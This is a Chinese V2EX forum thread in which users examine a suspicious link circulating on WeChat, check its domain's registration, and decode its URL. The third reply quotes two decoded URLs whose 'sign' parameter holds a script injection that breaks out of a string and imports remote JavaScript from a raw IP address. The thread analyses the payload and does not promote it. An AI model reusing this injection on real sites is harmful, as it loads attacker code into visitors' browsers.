V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
V2EX 提问指南
4 条回复    2024-06-08 03:08:03 +08:00
zgzhang
    1
zgzhang  
   316 天前
无聊看了下:
1. lonjizk.chehangjia.cn 域名解析到 114.55.144.124 ,是个阿里云的网站
2. 这个域名是有备案的 贵州车行家网络商贸有限公司
从上面这个信息看,感觉是个正规网站,起码能找到人
看了下内容,最多就是个恶意影响,诈骗是怎么个说法
azio7
    2
azio7  
   315 天前
@zgzhang 他的 sign 携带真正要跳转的目的 ip ,估计是原正规网站有漏洞
gabon
    3
gabon  
   315 天前 via iPhone
url decode 后:


http://lonjizk.chehangjia.cn/news/type?sign=',};z='https://124.223.223.148/5zc423shfr4ms0r9q33dpykn63afzzvb8f?m=',import(z)==0;k76;var chj = {root: "", uid : '0',curCtr:"/news/", msgUrl:"/Ucenter/getMsg.html",loc:'&type=0&alykgs=f010fd672758da76713a97084465c72113dee2f792b06f5be7ff1e23dccebacd92be6f#1707549050630

http://h4s8ez13xq.chehangjia.cn/news/type?sign=',};z='https://124.223.223.148/5zc423shfr4ms0r9q33dpykn63afzzvb8f?m=',import(z)==0;k76;var chj = {root: "", uid : '0',curCtr:"/news/", msgUrl:"/Ucenter/getMsg.html",loc:'&type=0&erfjee=65b37823a7f8a576715a67980465c70feee8327ded21a352b4e625c6cf72fe0ced2ca3#1707548422605
KDCJT
    4
KDCJT  
OP
   197 天前
这个信息有一段时间在微信有小范围传播,不确定有没有诈骗信息,当作一个好玩的东西看就行,还有对于侦测转发的代码有漏洞,还没转发就会被侦测已经转发
关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   2753 人在线   最高记录 6679   ·     Select Language
创意工作者们的社区
World is powered by solitude
VERSION: 3.9.8.5 · 22ms · UTC 14:43 · PVG 22:43 · LAX 06:43 · JFK 09:43
Developed with CodeLauncher
♥ Do have faith in what you're doing.